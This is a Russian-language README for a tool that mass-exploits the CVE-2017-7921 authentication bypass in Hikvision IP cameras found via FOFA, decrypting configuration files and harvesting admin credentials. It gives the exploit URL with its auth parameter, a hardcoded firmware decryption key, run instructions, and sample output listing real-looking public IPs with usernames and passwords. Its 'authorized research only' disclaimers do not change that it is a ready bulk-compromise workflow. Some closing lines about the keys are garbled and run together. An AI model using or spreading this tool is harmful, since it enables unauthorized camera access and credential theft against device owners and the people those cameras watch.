
Предназначен для быстрой проверки уязвимости CVE-2017-7921 в устройствах Hikvision с помощью FOFA, получения учетных данных для входа и вывода результатов в файл JSON.
Заявление о безопасности: данный инструмент предназначен только для авторизованных исследований безопасности и проверки уязвимостей
Важное примечание: использование данного инструмента означает ваше согласие со следующими условиями
Данный проект следует политике безопасности GitHub и правилам раскрытия Центра безопасности Hikvision.
Инструмент для массового обнаружения и проверки уязвимости обхода аутентификации CVE-2017-7921 в IP-камерах Hikvision. Поддерживает автоматическое дешифрование конфигурационных файлов и извлечение учётных данных.
git clone https://github.com/[ваше_имя_пользователя]/CVE-2017-7921-Research-Toolkit.git
cd CVE-2017-7921-Research-Toolkit
pip install -r requirements.txt
requests>=2.28.0
pycryptodome>=3.15.0
tqdm>=4.64.0
Создайте папку zc/ в каталоге инструмента и поместите туда список устройств в формате JSON (каждая строка – один объект устройства):
mkdir zc
Пример файла: devices_2025.json
{"city":"Lisbon","country":"PT","host":"109.50.152.186","link":"http://109.50.152.186:80"}
{"city":"Sao Paulo","country":"BR","host":"200.201.192.75","link":"http://200.201.192.75:8080"}
Описание полей:
| Поле | Описание | Обязательно |
|---|---|---|
link | HTTP/HTTPS адрес устройства | ✅ Да |
city | Город | ❌ Нет |
country | Код страны | ❌ Нет |
org | Организация/ISP | ❌ Нет |
python batch_decrypt.py
════════════════════════════════════════════════════════════════════════════════
Инструмент массового сканирования уязвимости конфигурационных файлов камер Hikvision
════════════════════════════════════════════════════════════════════════════════
Доступные JSON-файлы:
════════════════════════════════════════════════════════════════════════════════
1. devices_2025.json (45,678 байт)
════════════════════════════════════════════════════════════════════════════════
Выберите номер файла: 1
Выбран файл: devices_2025.json
Загрузка данных устройств...
Всего устройств для сканирования: 2000
Введите количество потоков (по умолчанию: 5): 10
Количество потоков: 10
Начало сканирования...
Всего отсканировано устройств: 2000
Обнаружено уязвимых устройств: 127
Уязвимые устройства сохранены в: vulnerable_devices.json
После завершения сканирования генерируется файл vulnerable_devices.json, содержащий информацию обо всех уязвимых устройствах.
Пример вывода:
[
{
"url": "http://109.50.152.186",
"config_url": "http://109.50.152.186/System/configurationFile?auth=YWRtaW46MTEK",
"username": "admin",
"password": "123456",
"city": "Lisbon",
"country": "PT",
"org": "ISP Telecom",
"status": "success"
}
]
/System/configurationFile?auth=YWRtaW46MTEK использует жёстко закодированные учётные данные279977f62f6cfd2d91cd75b889ce0c9a жёстко закодирован в прошивке0x73, 0x8B, 0x55, 0x44)Данное программное обеспечение предназначено только для авторизованных исследований безопасности и образовательных целей. Пользователь обязан самостоятельно обеспечить соблюдение всех применимых законов.
Последнее обновление: 2025-01-29 | Версия: v1.0.0 | Поддержка CVE: CVE-2017-7921